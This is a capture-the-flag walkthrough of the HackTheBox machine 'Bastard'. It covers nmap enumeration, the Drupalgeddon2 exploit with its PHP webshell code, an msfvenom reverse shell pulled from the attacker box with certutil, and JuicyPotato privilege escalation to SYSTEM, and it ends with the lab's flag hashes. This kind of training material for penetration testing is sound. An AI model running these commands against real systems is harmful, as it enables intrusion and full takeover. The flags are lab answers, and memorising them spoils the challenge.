HackTheBox | Bastard

HackTheBox | Bastard

a month ago   •   10 min read

By 0xBEN
Table of contents

Nmap Results

# Nmap 7.92 scan initiated Tue Aug 16 00:34:56 2022 as: nmap -T5 -p80,135,49154 -A -oA scan-all -Pn 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.014s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   15.45 ms 10.10.14.1
2   15.71 ms 10.10.10.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 16 00:36:10 2022 -- 1 IP address (1 host up) scanned in 74.38 seconds





Service Enumeration

TCP/80

Good info from the nmap scan:

  • http-server-header: Microsoft-IIS/7.5
  • Drupal 7

I check out the /robots.txt file and note the /CHANGELOG.txt entry. Opening it in the browser, it discloses a precise version number, so I take note of that for exploit research.

Tried to enumerate more files and folders with gobuster and feroxbuster , but the web server is throttling my requests. So, I'll focus on researching vulnerabilities for this version of Drupal instead.

Let's see what kind of exploits are available in Exploit DB. I am going to filter out authenticated and Metasploit payloads because:

  • We do not have a valid set of credentials
  • Doing this as OSCP prep, so trying to limit Metasploit usage
searchsploit Drupal 7 | grep -viE 'authenticated|metasploit'

This exploit looks like it could work for the version of Drupal on the target:

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb

Let's copy the exploit to the current working directory:

searchsploit -m 44449

Now, let's examine the exploit:

  • The exploit makes a request to the user registration form, the URL varies based on whether or not Drupal clean URLs are enabled or not.
# Make a request, check for clean URLs status ~ Enabled: /user/register   Disabled: /?q=user/register

  • Then, the exploit crafts a URL and payload depending on the Drupal version.
  • For Drupal 7, we inject the payload into the name field of the form
# Function gen_evil_url <cmd> [method] [shell] [phpfunction]
def gen_evil_url(evil, element="", shell=false, phpfunction="passthru")

  • Next, the exploit tests code execution in the web form by injecting a random string into the name field
  • If the server responds HTTP 200 or HTTP 500 and there's a response body, we should be good to exploit
  # Generate a random string to see if we can echo it
  random = (0...8).map { (65 + rand(26)).chr }.join
  url, payload = gen_evil_url("echo #{random}", e)

  response = http_request(url, "post", payload, $session_cookie)
  if (response.code == "200" or response.code == "500") and not response.body.empty?

  • Finally, the exploit injects a PHP backdoor via the form field and writes to shell.php the web root
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"

# Test to see if backdoor is there (if we managed to write it)
response = http_request("#{$target}#{webshellpath}", "post", "c=hostname", $session_cookie)
if response.code == "200" and not response.body.empty?
  puts success("Very Good News Everyone! Wrote to the web root! Waayheeeey!!!")
  break
  
# Forever loop
loop do
  # Default value
  result = "~ERROR~"

  # Get input
  command = Readline.readline("#{prompt}>> ", true).to_s

  # Check input
  puts warning("WARNING: Detected an known bad character (>)") if command =~ />/

  # Exit
  break if command == "exit"
  
...
...
...





Exploit

You may need to install a required Ruby dependency to use this exploit:

sudo gem install highline

Then, run the exploit:

ruby 44449.rb http://10.10.10.9





Post-Exploit Enumeration

The first line of order will be to get a more reliable shell. I am going to double-check the target system architecture and generate a reverse shell payload using msfvenom that I can execute as needed through the PHP pseudo-shell.

drupalgeddon2 >> systeminfo

System Type:               x64-based PC

Now, generate a reverse shell payload.

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -a x64 --platform windows -e x64/xor_dynamic -b '\x00' -f exe -o shell.exe

Start a Python web server to transfer the file to the target:

sudo python3 -m http.server 80

Use the PHP pseudo-shell to download the file to the target:

certutil.exe -urlcache -split -f http://kali-vpn-ip/shell.exe C:\Windows\Temp\shell.exe

Start a listener and run the exploit:

sudo nc -lnvp <kali-tcp-port>

drupalgeddon2 >> cmd.exe /c C:\Windows\Temp\shell.exe

Current User

Click to expand
USER INFORMATION
----------------

User Name         SID     
================= ========
nt authority\iusr S-1-5-17


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Group used for deny only                          
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled



OS & Kernel

Click to expand
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3582622-84461
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          16/8/2022, 7:32:24 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.494 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.512 MB
Virtual Memory: In Use:    583 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9



Users

Click to expand
AccountType Domain  Name          Disabled
----------- ------  ----          --------
        512 BASTARD Administrator    False
        512 BASTARD dimitris         False
        512 BASTARD Guest             True



Groups

Click to expand
Domain                                  Name                                   
------                                  ----                                   
BASTARD                                 Administrators                         
BASTARD                                 Backup Operators                       
BASTARD                                 Certificate Service DCOM Access        
BASTARD                                 Cryptographic Operators                
BASTARD                                 Distributed COM Users                  
BASTARD                                 Event Log Readers                      
BASTARD                                 Guests                                 
BASTARD                                 IIS_IUSRS                              
BASTARD                                 Network Configuration Operators        
BASTARD                                 Performance Log Users                  
BASTARD                                 Performance Monitor Users              
BASTARD                                 Power Users                            
BASTARD                                 Print Operators                        
BASTARD                                 Remote Desktop Users                   
BASTARD                                 Replicator                             
BASTARD                                 Users



Network

Interfaces
Windows IP Configuration

   Host Name . . . . . . . . . . . . : Bastard
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-50-56-B9-42-2D
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.10.10.9(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
   DNS Servers . . . . . . . . . . . : 10.10.10.2
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{56FEC108-3F71-4327-BF45-2B4EE355CD0F}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes


ARP Table
N/A


Routes
N/A


Open Ports
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:81             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1072
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       372
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       744
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       796
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       480
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       496
  TCP    10.10.10.9:139         0.0.0.0:0              LISTENING       4
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:81                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       668
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       372
  TCP    [::]:49153             [::]:0                 LISTENING       744
  TCP    [::]:49154             [::]:0                 LISTENING       796
  TCP    [::]:49155             [::]:0                 LISTENING       480
  TCP    [::]:49156             [::]:0                 LISTENING       496


Ping Sweep
N/A



Processes

Click to expand
Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName          
-------  ------    -----      ----- -----   ------     -- -----------          
     32       5      964       2580    26     0,00   1852 conhost              
    615      11     2160       4296    49             328 csrss                
     70       9     5952       5752    46             388 csrss                
    199      16     4368      11336    56            1868 dllhost              
      0       0        0         24     0               0 Idle                 
    164      25     7488      15412    86             756 LogonUI              
    553      20     4336      10364    45             496 lsass                
    136       7     2244       3784    17             504 lsm                  
    148      18     3412       7724    60            1984 msdtc                
    564      16    54320      42044   115            1072 mysqld               
    117      18    21852      27620   118            1456 php-cgi              
    331      26    59644      60692   552     1,56   2172 powershell           
    186      12     3608       7424    32             480 services             
     30       2      440       1052     5             236 smss                 
    265      19     6056      10768    80             320 spoolsv              
    293      32     9340      11956    55             276 svchost              
    347      14     3944       9280    45             596 svchost              
    218      16     3468       7632    37             668 svchost              
    275      15     8104      10388    47             744 svchost              
    914      40    19732      32324   124             796 svchost              
    519      21     6304      11428    47             844 svchost              
     91       8     1640       4932    30             888 svchost              
    416      27    10300      14456    96             928 svchost              
     95      10     4024       8548    41            1040 svchost              
     44       4      928       2592    13            1192 svchost              
    146      14     7144      10896    46            1344 svchost              
    434       0      112        304     3               4 System               
     97      11     4628      10404    63            1228 VGAuthService        
    278      23     9480      18856    86            1316 vmtoolsd             
    175      26     6384      12876    62            2828 w3wp                 
     77      10     1480       4184    48             372 wininit              
     74       6     1452       4104    25             436 winlogon             
    106       9     2304       5816    36             244 WmiPrvSE             
    239      16     8924      14520    56            1620 WmiPrvSE



Scheduled Tasks

Click to expand
Nothing outside of default system tasks





Privilege Escalation

Looking at the output of the whoami command, the first thing that stuck out to me is the SeImpersonatePrivilege , which immediately makes me think JuicyPotato.

The privilege escalation process will look like this:

  1. Download the 64-bit JuicyPotato.exe binary to Kali
  2. Transfer it to the target using a Python web server
  3. Find a CLSID for ComSvcs process
  4. Start a listener on Kali
  5. Run JuicyPotato.exe and re-use the PowerShell reverse shell exploit we already put on the host at C:\Windows\Temp\shell.exe .



First step is to download JuicyPotato.exe here and spin up the Python web server.

Releases · ohpe/juicy-potato
A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. - ohpe/juicy-potato
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
sudo python3 -m http.server 80

Now, let's download it to the target using our PowerShell reverse shell:

(New-Object Net.WebClient).DownloadFile('http://kali-vpn-ip/JuicyPotato.exe', 'C:\Windows\Temp\JuicyPotato.exe')

You can find a list of ComSvcs CLSID GUIDs for Windows Server 2008 R2 here. Preferably, choose a CLSID with SYSTEM privileges.

Windows Server 2008 R2 Enterprise
A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.

Start a listener on Kali and run the exploit. We are going to re-use our PowerShell reverse shell payload, so use the same TCP port as before.

sudo nc -lnvp <kali-tcp-port>

We'll use the JuicyPotato.exe  exploit to run cmd.exe as SYSTEM , which will then invoke our reverse shell.

C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a '/c C:\Windows\Temp\shell.exe' -l 4444 -t * -c '{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}'





Flags

C:\Users\dimitris\Desktop\user.txt
d74dd2dd6d42153770e0acbed24eb314


C:\Users\Administrator\Desktop\root.txt
176631de8dd060d1c027607d0639471c

Spread the word

Keep reading